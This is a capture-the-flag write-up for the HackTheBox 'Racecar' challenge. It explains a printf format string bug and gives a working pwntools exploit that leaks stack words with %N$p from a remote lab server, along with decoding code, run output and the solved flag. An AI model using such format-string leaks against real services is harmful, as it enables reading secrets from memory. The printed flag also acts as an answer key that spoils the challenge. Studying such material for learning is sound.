Racecar

CHALLENGE DESCRIPTION
Did you know that racecar spelled backwards is racecar? Well, now that you know everything about racing, win this race and get the flag!

The binary has a format string vulnerability: the message we give to the press is handed to printf as the format string (as the run below shows, a string of %p prints raw stack words). Since the flag is stored on the stack, we can use format specifiers to read it straight off the stack.

┌──(root㉿kali)-[/home/kali/hackthebox/pwn]
└─# ./racecar

🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌
      ______                                       |xxx|
     /|_||_\`.__                                   | F |                                                                             
    (   _    _ _\                                  |xxx|                                                                             
*** =`-(_)--(_)-'                                  | I |                                                                             
                                                   |xxx|                                                                             
                                                   | N |                                                                             
                                                   |xxx|                                                                             
                                                   | I |                                                                             
                                                   |xxx|                                                                             
             _-_-  _/\______\__                    | S |                                                                             
           _-_-__ / ,-. -|-  ,-.`-.                |xxx|                                                                             
            _-_- `( o )----( o )-'                 | H |                                                                             
                   `-'      `-'                    |xxx|                                                                             
🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌                                                                             
                                                                                                                                     
Insert your data:                                                                                                                    
                                                                                                                                     
Name: name                                                                                                                           
Nickname: something                                                                                                                  
                                                                                                                                     
[+] Welcome [name]!                                                                                                                  
                                                                                                                                     
[*] Your name is [name] but everybody calls you.. [something]!                                                                       
[*] Current coins: [69]                                                                                                              
                                                                                                                                     
1. Car info                                                                                                                          
2. Car selection                                                                                                                     
> 2                                                                                                                                  
                                                                                                                                     
                                                                                                                                     
Select car:                                                                                                                          
1. 🚗
2. 🏎                                                                                                                                 
> 2                                                                                                                                  
                                                                                                                                     
                                                                                                                                     
Select race:                                                                                                                         
1. Highway battle                                                                                                                    
2. Circuit                                                                                                                           
> 1                                                                                                                                  
                                                                                                                                     
[*] Waiting for the race to finish...                                                                                                
                                                                                                                                     
[+] You won the race!! You get 100 coins!                                                                                            
[+] Current coins: [169]                                                                                                             
                                                                                                                                     
[!] Do you have anything to say to the press after your big victory?                                                                 
> %p %p %p %p %p %p %p %p                                                                                                            

The Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this: 
0x583ec200 0x170 0x565bfdfa 0x42 (nil) 0x26 0x2 0x1

We don't know at which stack offset the flag sits, so we walk the stack with printf's direct parameter access: %N$p prints the N-th argument as a pointer, and on this 32-bit binary (the leaked 0x565bfdfa is a 32-bit address) the arguments are read straight from the stack, one 4-byte word per offset. Each word is printed as a little-endian integer, so the bytes of a flag word have to be reversed before they are appended to the flag. The Python script below does exactly that: it opens a fresh connection for every offset, sends %N$p, and keeps only the answers that hex-decode to ASCII.

Exploit:

from pwn import *

flag = ''

# Try stack offsets 1..99 with printf's direct parameter access:
# "%i$p" prints the i-th argument (here: the i-th stack word) as a pointer.
# Offset 0 is not a valid argument number, so start at 1.
for i in range(1, 100):
    try:
        # Connect to server; the context manager closes the socket afterwards
        with remote('83.136.253.251', 42831) as io:
            io.sendlineafter(b'Name: ', b'anas')
            io.sendlineafter(b'Nickname: ', b'something')
            io.sendlineafter(b'> ', b'2')   # Car selection
            io.sendlineafter(b'> ', b'2')   # Second car
            io.sendlineafter(b'> ', b'1')   # Highway battle, which we win
            # Send the format string for this offset
            io.sendlineafter(b'> ', '%{}$p'.format(i).encode())
            # Skip the empty line and the "The Man, the Myth, ..." banner
            io.recvline()
            io.recvline()
            result = io.recv()
            if b'nil' not in result:
                print(str(i) + ': ' + str(result))
                try:
                    # Drop the "0x", hex-decode and reverse the bytes:
                    # the stack word was printed as a little-endian integer
                    decoded = unhex(result.strip().decode()[2:])
                    reversed_hex = decoded[::-1]
                    print(str(reversed_hex))
                    # Build up flag (non-flag words that happen to be ASCII,
                    # e.g. 0x42 -> 'B', get appended too; trim them by hand)
                    flag += reversed_hex.decode()
                except (ValueError, UnicodeDecodeError):
                    # Not hex or not ASCII: a pointer or counter, not flag text
                    pass
    except EOFError:
        # The service closed the connection early; move on to the next offset
        pass

# Print the reassembled flag
info(flag)
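Decoding the leaked words offline, as an added example that is not part of the original writeup or of the exploit above: it takes the %N$p answers (SAMPLE_LEAKS is a constructed dictionary built from the values printed in the run below, plus a few non-flag stack words and a gap), rebuilds each 4-byte little-endian word with int.to_bytes instead of unhex()[::-1], which also restores the leading zero bytes that %p drops, keeps only runs of consecutive offsets that decode to printable text, and matches the HTB{...} pattern, so stray words such as 0x42 ('B') no longer end up in the flag. WORD_SIZE, SAMPLE_LEAKS and the function names are my own.

```python
import re
import string

# Word size of the target. The values leaked on this page (e.g. 0x565bfdfa)
# are 32-bit, so every %N$p reveals 4 bytes of the stack; use 8 for x86-64.
WORD_SIZE = 4

# Constructed sample input (assumption, not a real capture): the "%N$p"
# answers keyed by offset N, taken from the run on this page plus a few
# non-flag stack words so the filtering is exercised. Offsets 6-11 are left
# out on purpose, as they would be if those offsets had printed (nil).
SAMPLE_LEAKS = {
    1: "0x583ec200", 2: "0x170", 3: "0x565bfdfa", 4: "0x42", 5: "(nil)",
    12: "0x7b425448", 13: "0x5f796877", 14: "0x5f643164", 15: "0x34735f31",
    16: "0x745f3376", 17: "0x665f3368", 18: "0x5f67346c", 19: "0x745f6e30",
    20: "0x355f3368", 21: "0x6b633474", 22: "0x7d213f", 23: "0x1",
}

# Bytes accepted as flag text: printable ASCII minus the whitespace controls.
TEXT_BYTES = frozenset(string.printable.encode()) - frozenset(b"\t\n\r\x0b\x0c")

# Flag format of the challenge; anything else inside a text run is ignored.
FLAG_RE = re.compile(rb"HTB\{[^{}]*\}")


def word_to_bytes(leak, word_size=WORD_SIZE):
    """Convert one %N$p answer back into the bytes it occupies in memory.

    printf prints the stack word as an integer, so on a little-endian target
    the first byte in memory ends up as the lowest hex digits. to_bytes(...,
    "little") undoes that; it is the same reversal as unhex()[::-1] but also
    restores the leading zero bytes %p drops (0x7d213f is really 3f 21 7d 00).
    Trailing NULs are the unused tail of the last flag word and are stripped.
    Returns None for (nil) or anything that is not a hex value.
    """
    if not leak.startswith("0x"):
        return None
    value = int(leak, 16)
    if value >= 1 << (8 * word_size):
        raise ValueError(f"{leak} does not fit in a {word_size}-byte word")
    return value.to_bytes(word_size, "little").rstrip(b"\x00")


def text_runs(leaks, word_size=WORD_SIZE):
    """Join consecutive offsets whose words decode to text into byte strings.

    The flag is contiguous on the stack, so it must come from consecutive
    offsets: a missing offset, a (nil), or a word containing non-text bytes
    (a pointer, a counter) ends the current run. Small integers such as
    0x42 ("B") still pass the byte filter, which is why extract_flag()
    additionally matches the flag format instead of trusting every run.
    """
    runs, current, previous = [], b"", None
    for offset in sorted(leaks):
        chunk = word_to_bytes(leaks[offset], word_size)
        is_text = bool(chunk) and all(b in TEXT_BYTES for b in chunk)
        if current and (not is_text or offset != previous + 1):
            runs.append(current)
            current = b""
        if is_text:
            current += chunk
        previous = offset
    if current:
        runs.append(current)
    return runs


def extract_flag(leaks, word_size=WORD_SIZE):
    """Return the first HTB{...} found in any text run, or None when the
    leaked offsets did not cover the whole flag (then leak more offsets)."""
    for run in text_runs(leaks, word_size):
        match = FLAG_RE.search(run)
        if match:
            return match.group().decode()
    return None


if __name__ == "__main__":
    for run in text_runs(SAMPLE_LEAKS):
        print("text run:", run)
    print("flag:", extract_flag(SAMPLE_LEAKS))
```

The same decoder works for a 64-bit target by setting WORD_SIZE to 8; each %N$p then yields up to 8 flag characters, and the leading-zero handling in word_to_bytes matters more often, because a partially filled last word prints with fewer hex digits than the word holds.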

Let's run the fuzzer:

┌──(kali㉿kali)-[~/hackthebox/pwn]
└─$ python exploit.py

...
[+] Opening connection to 83.136.253.251 on port 42831: Done
12: b'0x7b425448\n'
b'HTB{'
[+] Opening connection to 83.136.253.251 on port 42831: Done
13: b'0x5f796877\n'
b'why_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
14: b'0x5f643164\n'
b'd1d_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
15: b'0x34735f31\n'
b'1_s4'
[+] Opening connection to 83.136.253.251 on port 42831: Done
16: b'0x745f3376\n'
b'v3_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
17: b'0x665f3368\n'
b'h3_f'
[+] Opening connection to 83.136.253.251 on port 42831: Done
18: b'0x5f67346c\n'
b'l4g_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
19: b'0x745f6e30\n'
b'0n_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
20: b'0x355f3368\n'
b'h3_5'
[+] Opening connection to 83.136.253.251 on port 42831: Done
21: b'0x6b633474\n'
b't4ck'
[+] Opening connection to 83.136.253.251 on port 42831: Done
22: b'0x7d213f\n'
b'?!}'
...
[*] HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}

Flag:

HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}
